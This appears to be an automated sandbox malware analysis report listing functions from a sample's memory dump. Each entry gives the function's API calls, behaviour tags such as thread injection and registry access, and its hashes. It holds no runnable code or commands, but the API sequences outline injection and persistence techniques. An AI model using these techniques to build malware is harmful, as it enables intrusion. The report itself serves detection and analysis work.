Opcode ID: 98a833d960eaf6928bfee9de1a378e0f99c7b5891b2d68612c3912fdc27538f9
Instruction ID: e4154d793a880b66429632f13a493ff741d4568c0d9e5140d6d16a815b6c4330
Opcode Fuzzy Hash: 98a833d960eaf6928bfee9de1a378e0f99c7b5891b2d68612c3912fdc27538f9
Instruction Fuzzy Hash: AF51A531608B058FD765EB69E8A9B66B7E6FBE9301F00442ED84AC3351EF34D845CB42

Uniqueness

Uniqueness Score: 100.00%

Function 003F8000, Relevance: 4.8, APIs: 3, Instructions: 346
nativelibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL ref: 003F80F3
NtProtectVirtualMemory.NTDLL ref: 003F827A
NtProtectVirtualMemory.NTDLL ref: 003F8309

Memory Dump Source

Source File: 00000013.00000002.927961346.00000000003F8000.00000040.00000001.sdmp, Offset: 003F8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3f8000_control.jbxd

Similarity

API ID: MemoryProtectVirtual$Load
String ID:
API String ID: 3215406092-0
Opcode ID: 9635dcf2e0dc43142604f9b269d15d6a84800eb1b40092d1a36b1f86752a6780
Instruction ID: a1486c647858de9ff2140c747643783dcb257c21a316cc95588f06d2451a69b7
Opcode Fuzzy Hash: 9635dcf2e0dc43142604f9b269d15d6a84800eb1b40092d1a36b1f86752a6780
Instruction Fuzzy Hash: 10A1F93121CBC94FC72ADF28CC916B5B7E1FB96310F59496ED1CBC7252DA34A84A8742

Uniqueness

Uniqueness Score: 1.64%

Function 003CBA44, Relevance: 4.8, APIs: 3, Instructions: 273
memoryUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE ref: 003CBA78
VirtualAlloc.KERNELBASE ref: 003CBB8A

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID: AllocCreateHeapVirtual
String ID:
API String ID: 3668484030-0
Opcode ID: 3874eb5c339fb57201337d5a60fbf6f0b56df5405569b11d87152d658f625f37
Instruction ID: 92169c204c2cc3e992afb8b579a09544dc88fc2609fa23849d920256989f1368
Opcode Fuzzy Hash: 3874eb5c339fb57201337d5a60fbf6f0b56df5405569b11d87152d658f625f37
Instruction Fuzzy Hash: 8981B5306087098FE769EF28E889B6673D5EB94310F21412EE48BC3652EF75DD078741

Uniqueness

Uniqueness Score: 100.00%

Function 003C7700, Relevance: 4.1, APIs: 2, Instructions: 1072synchronizationUNIQUE

Download Yara Rule

APIs

CreateMutexExA.KERNEL32 ref: 003C77CD
GetUserNameA.ADVAPI32 ref: 003C79EE

Part of subcall function 003DF740: CreateThread.KERNELBASE ref: 003DF770
Part of subcall function 003DF740: QueueUserAPC.KERNELBASE ref: 003DF787

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID: CreateUser$MutexNameQueueThread
String ID:
API String ID: 2503873790-0
Opcode ID: 054a9a10c6f96f382a9ba6bbdf5d9fb3b6ea9894670aefd674c1ac630298ef58
Instruction ID: 82f1bd1dfaefa7f02041dbbad2128d5a0af62a7347fa7a0f52d149176a42994e
Opcode Fuzzy Hash: 054a9a10c6f96f382a9ba6bbdf5d9fb3b6ea9894670aefd674c1ac630298ef58
Instruction Fuzzy Hash: C9729471618A088FE72AEF28EC85A6977E5F795700B21452ED44BC3261DF38DD47CB82

Uniqueness

Uniqueness Score: 100.00%

Function 003CAEE0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 214
nativeUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateSection.NTDLL ref: 003CB082

Part of subcall function 003D08F4: NtMapViewOfSection.NTDLL ref: 003D0940

Strings

0, xrefs: 003CB076

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID: Section$CreateView
String ID: 0
API String ID: 1585966358-4108050209
Opcode ID: 8d3327ad2bdf03cb36c6e95cb58f32ae3bf8030dfbcdd593aad816d0883e06f5
Instruction ID: d48531d71b2cb67cb7789414ef9f88b244d3d2eaff76604ca9db882f7d0ac67b
Opcode Fuzzy Hash: 8d3327ad2bdf03cb36c6e95cb58f32ae3bf8030dfbcdd593aad816d0883e06f5
Instruction Fuzzy Hash: B861D57120CB098FDB55EF28D885B66B7E5FBA8301F11456EE84AC7261DB34DC42CB82

Uniqueness

Uniqueness Score: 100.00%

Function 003C2558, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL ref: 003C2595

Strings

@, xrefs: 003C2579

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID: AllocateMemoryVirtual
String ID: @
API String ID: 2167126740-2766056989
Opcode ID: 3480149a3f03a56083bbfdc84b4547b5a69d0fe419a09f2f6cf098ba80d26625
Instruction ID: bf6a1de9e5777c9fc3cd7c5f194993d48def9ea192cd42bad1a6292cb765b64b
Opcode Fuzzy Hash: 3480149a3f03a56083bbfdc84b4547b5a69d0fe419a09f2f6cf098ba80d26625
Instruction Fuzzy Hash: 3EF09070615A088FDB44DFA8D8DCA3AB6E0F758301F90092DE11BCB254DB7889448742

Uniqueness

Uniqueness Score: 8.94%

Function 003E8D90, Relevance: 1.7, APIs: 1, Instructions: 183nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 003E8E05

Part of subcall function 003C59EC: NtReadVirtualMemory.NTDLL ref: 003C5A0B

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID: InformationMemoryProcessQueryReadVirtual
String ID:
API String ID: 1498878907-0
Opcode ID: a4b6c7807c886303480688e0486f57af3fca22130c23e14c4356b330bb6c04c0
Instruction ID: eea421f6ab2d8591694ef80b24847e095804dc258ef1d831252692ebedafcb4c
Opcode Fuzzy Hash: a4b6c7807c886303480688e0486f57af3fca22130c23e14c4356b330bb6c04c0
Instruction Fuzzy Hash: A151883061CB588BD75AEB19E8857A673D6FBD8300F04466EE88DC7285DF34D945C782

Uniqueness

Uniqueness Score: 0.01%

Function 003E57EC, Relevance: 1.6, APIs: 1, Instructions: 51nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 003E5812

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 28b44056cf796de4eb640d76da906fe63571bb67ad8c165bfa38133ab1ad9ada
Instruction ID: 739e61820d444da6b6e9248c5cd8211da602409de99b542551d6a0a778a41f53
Opcode Fuzzy Hash: 28b44056cf796de4eb640d76da906fe63571bb67ad8c165bfa38133ab1ad9ada
Instruction Fuzzy Hash: 2301A430318E4D8FDB85EF69D4C4A3573E4FBA830AB44066EA84AC7160DB34D881CB01

Uniqueness

Uniqueness Score: 0.01%

Function 003D08F4, Relevance: 1.5, APIs: 1, Instructions: 46nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL ref: 003D0940

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
Instruction ID: 6ad36f4949d3d100f47a78cadcb357d8f346cf0908a668f326935fbd89c3e072
Opcode Fuzzy Hash: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
Instruction Fuzzy Hash: C001D670A08B048FCB48DF69D4C8569BBE1FB58311B10066FE949CB796DB70D885CB45

Uniqueness

Uniqueness Score: 0.01%

Function 003E08B8, Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL ref: 003E08D7

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 62ba6affd158bdae49ea9acc6e39b041216258fa7157e3abd4a7b2d0a9a33b91
Instruction ID: 68f67d31b4bd79e55b7a135a71a8ae07e892422cfc2045ed70c05c0a0fad640f
Opcode Fuzzy Hash: 62ba6affd158bdae49ea9acc6e39b041216258fa7157e3abd4a7b2d0a9a33b91
Instruction Fuzzy Hash: E5E01A74B15A948FEB046BFA9C8923972D1E788205F10493AE985C73A0D7A9C8859682

Uniqueness

Uniqueness Score: 0.03%

Function 003C59EC, Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON

Download Yara Rule

APIs

NtReadVirtualMemory.NTDLL ref: 003C5A0B

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID: MemoryReadVirtual
String ID:
API String ID: 2834387570-0
Opcode ID: cfc17468bf204698639cbc84dba6562498a06be26e562d427e0299399ff4bd6e
Instruction ID: b4357f371819f01609cb5357a82bd808be3f56fe9302a08d00afd579e3d2a0fb
Opcode Fuzzy Hash: cfc17468bf204698639cbc84dba6562498a06be26e562d427e0299399ff4bd6e
Instruction Fuzzy Hash: 57E0DF78720A408BEB116BB98CC963973D0F788302F200A3DE945C7320E62ADC868742

Uniqueness

Uniqueness Score: 0.02%

Function 003D93D8, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 136
registryUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003D96C4: RegCreateKeyA.ADVAPI32 ref: 003D96E7

RegQueryValueExA.KERNELBASE ref: 003D9441
RegCloseKey.KERNELBASE ref: 003D94AA

Strings

(, xrefs: 003D944D
(, xrefs: 003D9489

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID: CloseCreateQueryValue
String ID: ($(
API String ID: 4083198587-222463766
Opcode ID: 1b535c6527e48170439bf6b41acb63c475a550c67078387eda5797225d392d3d
Instruction ID: 894f7b3ca16b0d6490d6202a137cabc24a0e1dc61f85c2b67426475a0dd86516
Opcode Fuzzy Hash: 1b535c6527e48170439bf6b41acb63c475a550c67078387eda5797225d392d3d
Instruction Fuzzy Hash: F74180316187488FE709DF19E8897A573F6FB98305F00852EE48EC32A1DF789946CB81

Uniqueness

Uniqueness Score: 100.00%

Function 003C4154, Relevance: 6.2, APIs: 4, Instructions: 234
threadinjectionUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003C3B0C: FindCloseChangeNotification.KERNELBASE ref: 003C3BB8

VirtualProtectEx.KERNELBASE ref: 003C425B
ResumeThread.KERNELBASE ref: 003C4298
SuspendThread.KERNELBASE ref: 003C42BB

Part of subcall function 003E6338: RtlAllocateHeap.NTDLL ref: 003E63DD

VirtualProtectEx.KERNELBASE ref: 003C4338

Part of subcall function 003E02B0: VirtualProtectEx.KERNELBASE ref: 003E0304

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID: ProtectVirtual$Thread$AllocateChangeCloseFindHeapNotificationResumeSuspend
String ID:
API String ID: 1287749370-0
Opcode ID: 695bb416bac1cc87e36b157813b3d7e19a5f53d9d2b6c12f7305fae2f417cc9e
Instruction ID: bba8e1666476288bccd5852c6684f83e6a6302a5b15e88e57a85dd80b54815a7
Opcode Fuzzy Hash: 695bb416bac1cc87e36b157813b3d7e19a5f53d9d2b6c12f7305fae2f417cc9e
Instruction Fuzzy Hash: B661AE3060CB484BDBA9EB18E895B6AB3D5FBD8311F50092DE58EC3291DF34DD428B46

Uniqueness

Uniqueness Score: 100.00%

Function 003CE318, Relevance: 6.1, APIs: 4, Instructions: 146
fileUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE ref: 003CE3E9
SetFilePointer.KERNELBASE ref: 003CE403
ReadFile.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003E66E9), ref: 003CE425
FindCloseChangeNotification.KERNELBASE ref: 003CE440

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID: File$ChangeCloseCreateFindNotificationPointerRead
String ID:
API String ID: 2405668454-0
Opcode ID: 891f844bcf4124cf303be152b64050e6c158c34e989a9a251bbc060bb9b45e2b
Instruction ID: 28babea637b73e3f518200b0e06d79929bf988d92fc54b41265fbcca39624d8a
Opcode Fuzzy Hash: 891f844bcf4124cf303be152b64050e6c158c34e989a9a251bbc060bb9b45e2b
Instruction Fuzzy Hash: 55410B30218A084FDB59DF28D8C4B6977E2FB98314B258A6ED09BC7251DF34D843CB81

Uniqueness

Uniqueness Score: 23.02%

Function 003E9D70, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 311
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 003E9EAD

Strings

H, xrefs: 003E9D94

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID: LibraryLoad
String ID: H
API String ID: 1029625771-2852464175
Opcode ID: 7e6a2b9710a31f86cdeabb861bb2e229a477ebaa67f92c0b2d10e942182f022f
Instruction ID: e507faef7e33e925dfd0571f7bafce2a4054e648c632cf2a5795a21fcccaab45
Opcode Fuzzy Hash: 7e6a2b9710a31f86cdeabb861bb2e229a477ebaa67f92c0b2d10e942182f022f
Instruction Fuzzy Hash: 76A1A530508F498FD755DF59D8887A673E1FBA8305F00462ED849C72A1EF74D945CB81

Uniqueness

Uniqueness Score: 16.53%

Function 003C4F80, Relevance: 3.2, APIs: 2, Instructions: 202
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003C7650: VirtualProtect.KERNELBASE ref: 003C7683

VirtualProtect.KERNELBASE ref: 003C509E
VirtualProtect.KERNELBASE ref: 003C50C1

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: a9b66ae03c49d3d670cce81498e72a25c12f1e2e390bf7910731d8dff046be06
Instruction ID: 69bb6b87ce0eeec87dad17c2991ed87a3878cb5e1e6a656cf2f20e6303c15068
Opcode Fuzzy Hash: a9b66ae03c49d3d670cce81498e72a25c12f1e2e390bf7910731d8dff046be06
Instruction Fuzzy Hash: EC515970618F098FDB55EF29D889B25B7E0FB58301B20056EE84EC7661DB34ED85CB82

Uniqueness

Uniqueness Score: 0.02%

Function 003E33F8, Relevance: 3.2, APIs: 2, Instructions: 151
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrRChrA.KERNELBASE ref: 003E346C
RtlAddVectoredContinueHandler.NTDLL ref: 003E3560

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID: ContinueHandlerVectored
String ID:
API String ID: 3758255415-0
Opcode ID: 4577307a17eb1eaf92b73ee140a033795f5dd91c1f22872dc3b5b1715b860cb7
Instruction ID: 39ec515dc71c12e0653882855194407a6e67894ea19f744262fa847f648d36ce
Opcode Fuzzy Hash: 4577307a17eb1eaf92b73ee140a033795f5dd91c1f22872dc3b5b1715b860cb7
Instruction Fuzzy Hash: 8C41C231608A9A8FE766EF29D84827A77E2FB98305F05463EE446C36E1DF38C505DB01

Uniqueness

Uniqueness Score: 100.00%

Function 003CFC9C, Relevance: 3.1, APIs: 2, Instructions: 106
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(?,?,?,?,?,?,0001E450,003CE2F2), ref: 003CFCF6
RegCloseKey.KERNELBASE ref: 003CFD6F

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID: CloseOpen
String ID:
API String ID: 47109696-0
Opcode ID: 7d48035e793e32baa19582c6306f03908215a96846196f1319b411857311b3e9
Instruction ID: c1c93766924f533a441ad263b7c7e71ce1c4f048474757bef7d9da11e6308bca
Opcode Fuzzy Hash: 7d48035e793e32baa19582c6306f03908215a96846196f1319b411857311b3e9
Instruction Fuzzy Hash: 43315031718B084F9769EF68E884A5AB3E2F798300B114A7EE44FC3255DB34DD45CB82

Uniqueness

Uniqueness Score: 0.28%

Function 003D46D4, Relevance: 3.1, APIs: 2, Instructions: 103
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32(?,?,?,?,?,?,00000005,003C7DC1), ref: 003D47AD
FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,00000005,003C7DC1), ref: 003D47BF

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID: ChangeCloseFindNotificationSleep
String ID:
API String ID: 1821831730-0
Opcode ID: 3b7804e9e64491a331c0f58934d80cde8b5b8d1df9b3391a246165b06147396d
Instruction ID: 57d2ecc0ef15b92d2afe208f44223374f1435d368f3b7000a24aadfa523401e1
Opcode Fuzzy Hash: 3b7804e9e64491a331c0f58934d80cde8b5b8d1df9b3391a246165b06147396d
Instruction Fuzzy Hash: 343184317046858BEB4AEF79ECD59AF73E6EBA83403418529A817C73A5DF38DC058B41

Uniqueness

Uniqueness Score: 100.00%

Function 003C387C, Relevance: 3.1, APIs: 2, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNELBASE ref: 003C38BF
RegQueryValueExA.KERNELBASE ref: 003C3943

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: e6742aee4842c035a40f363fc1b4db91e210f4a9bbf142c8cdf5b115daab82b7
Instruction ID: ff4142bb0893f11a98bcca0fbdd7c9cac29bb97a81fa4ca15a300d63e9555707
Opcode Fuzzy Hash: e6742aee4842c035a40f363fc1b4db91e210f4a9bbf142c8cdf5b115daab82b7
Instruction Fuzzy Hash: 2D31713161CB088FDB58EF18D489A66B7E1FBA8311F21456EE849C3252EF74DD458B82

Uniqueness

Uniqueness Score: 0.02%

Function 003D6534, Relevance: 3.1, APIs: 2, Instructions: 97registryCOMMON

Download Yara Rule

APIs

Part of subcall function 003D96C4: RegCreateKeyA.ADVAPI32 ref: 003D96E7

RegQueryValueExA.KERNELBASE ref: 003D658B
RegCloseKey.KERNELBASE ref: 003D65FB

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID: CloseCreateQueryValue
String ID:
API String ID: 4083198587-0
Opcode ID: 55fdfe4b7456eacbb3d02b6717a6ec586e20cf8e62733b169a26c5594a4b745d
Instruction ID: 36bc0bec802a25f15284806e0cfa13322f447915e39fa842773148dd97ee1782
Opcode Fuzzy Hash: 55fdfe4b7456eacbb3d02b6717a6ec586e20cf8e62733b169a26c5594a4b745d
Instruction Fuzzy Hash: 20216031618B088FE754EF28E88966677E5FB9C351F00852AF45AC3265DB34DD418B82

Uniqueness

Uniqueness Score: 0.12%

Function 003D96C4, Relevance: 3.1, APIs: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32 ref: 003D96E7
RegOpenKeyA.ADVAPI32 ref: 003D96F4

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID: CreateOpen
String ID:
API String ID: 436179556-0
Opcode ID: 4f2da5dc37d6464ee92d4e41f62eaed1ccd9c1118d19b43c869c43d94e79b462
Instruction ID: 2d1ca5b43a26a64b2adf084c8d08402af541aab09955883161468ac203dfc007
Opcode Fuzzy Hash: 4f2da5dc37d6464ee92d4e41f62eaed1ccd9c1118d19b43c869c43d94e79b462
Instruction Fuzzy Hash: 21018031618A488FDB44EF5C948876ABBE1FBA8351F15442FE98AC3361DA74C9458B43

Uniqueness

Uniqueness Score: 10.55%

Function 003DF740, Relevance: 3.1, APIs: 2, Instructions: 59threadinjectionUNIQUE

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 003DF770
QueueUserAPC.KERNELBASE ref: 003DF787

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID: CreateQueueThreadUser
String ID:
API String ID: 3600083758-0
Opcode ID: 76ccf884eebe870dc9684afbaaa87b685695e52e285fbfcaa650d4ee971cb551
Instruction ID: c26fdf043384a95559a1a8c26d37ea3f3c25d52913aa72b3020b191d3a6bbe08
Opcode Fuzzy Hash: 76ccf884eebe870dc9684afbaaa87b685695e52e285fbfcaa650d4ee971cb551
Instruction Fuzzy Hash: EB010031714A184FFB45EB6DA84DA2977E2E7A8311B15466AE40AC3270DF74DC428785

Uniqueness

Uniqueness Score: 100.00%

Function 003DDF40, Relevance: 1.7, APIs: 1, Instructions: 216memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 003DE08C

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: e3219c7e06d4e1157cb5ead98e94965a76bfb1732a6058a61aaacd14d0df76f9
Instruction ID: 857ec9f2e5587a5d8d3497f527b3c1a87faf40fc179b7996bdb42191edf347d7
Opcode Fuzzy Hash: e3219c7e06d4e1157cb5ead98e94965a76bfb1732a6058a61aaacd14d0df76f9
Instruction Fuzzy Hash: D3619571618F099FD794EF18E889A6577E4FB68301F50452EE88AC7661EB34EC41CB82

Uniqueness

Uniqueness Score: 0.02%

Function 003DB820, Relevance: 1.6, APIs: 1, Instructions: 107processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE ref: 003DB8C4

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: b2d6244d53668073118268cc0144f7c52f59c40bf57eca16e0252b7e217b429a
Instruction ID: c057ffce5167ed017320b20ed7bb598aba9a66757a3b300aa42beace4fdbbe7b
Opcode Fuzzy Hash: b2d6244d53668073118268cc0144f7c52f59c40bf57eca16e0252b7e217b429a
Instruction Fuzzy Hash: D131417160CB488FDB94EF1C9889A65B7E5FB98311F01466EE84DC3362DB30EC418B82

Uniqueness

Uniqueness Score: 0.16%

Function 003C3494, Relevance: 1.6, APIs: 1, Instructions: 104COMMON

Download Yara Rule

APIs

RtlDeleteBoundaryDescriptor.NTDLL ref: 003C3536

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID: BoundaryDeleteDescriptor
String ID:
API String ID: 3203483114-0
Opcode ID: 4b9e317fe6c2c780727a49776cc005ffe60dd5b2bf4f1972ee81ec9bca76c16d
Instruction ID: dde80833650c4bcc7799263497f7d8623c75d3a92ae032d2447dec1b8b07a676
Opcode Fuzzy Hash: 4b9e317fe6c2c780727a49776cc005ffe60dd5b2bf4f1972ee81ec9bca76c16d
Instruction Fuzzy Hash: B4216034618A0C4FDBA9EF69A889729B7A1F799300B20853DE55AC3252EE34DD46C781

Uniqueness

Uniqueness Score: 16.53%

Function 003C7650, Relevance: 1.6, APIs: 1, Instructions: 77memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 003C7683

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 639ecdc61c2bcdd9962cdcc3ea4c2965d18f35d31a2eaa775defab5f490dba10
Instruction ID: c14c199b848f1af27e84db8520a11c84cd608924ba3e5110efd430f88d3964fd
Opcode Fuzzy Hash: 639ecdc61c2bcdd9962cdcc3ea4c2965d18f35d31a2eaa775defab5f490dba10
Instruction Fuzzy Hash: 3211637070CB088F5B64EF6DA84666977E6F798341710463EEC4EC3255EA34ED468B83

Uniqueness

Uniqueness Score: 0.02%

Function 003C3B0C, Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE ref: 003C3BB8

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: b2b66764f4e37eca7febb7bb23449f78a8ae36cdaf9f9a8997a04f53b9653b54
Instruction ID: 3e1ac55f832f8bc62a30fd7932d116f17a3f689d11f9102cbf92168e1f1d8037
Opcode Fuzzy Hash: b2b66764f4e37eca7febb7bb23449f78a8ae36cdaf9f9a8997a04f53b9653b54
Instruction Fuzzy Hash: F9215E31218E194FEBA5EF59D888B2677F1FBA8301B11453EA51AC3260DF34DD458B41

Uniqueness

Uniqueness Score: 0.16%

Function 003E02B0, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

Part of subcall function 003E08B8: NtWriteVirtualMemory.NTDLL ref: 003E08D7

VirtualProtectEx.KERNELBASE ref: 003E0304

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID: Virtual$MemoryProtectWrite
String ID:
API String ID: 1789425917-0
Opcode ID: 6de53cd7df4643948cefd0012f19627a237aac038176ac540b0f962cdcce38c2
Instruction ID: f11abb003d5dcd58117b7892b52549f44d68a8ec944addb05cc8e619689302bf
Opcode Fuzzy Hash: 6de53cd7df4643948cefd0012f19627a237aac038176ac540b0f962cdcce38c2
Instruction Fuzzy Hash: 99017C70618B488FCB48EF9DA4C9525B7E0EB9C310F4005AEE90DCB296CB70DD84CB86

Uniqueness

Uniqueness Score: 0.13%

Function 003D62F8, Relevance: 1.5, APIs: 1, Instructions: 237stringCOMMON

Download Yara Rule

APIs

lstrcmp.KERNEL32 ref: 003D6425

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

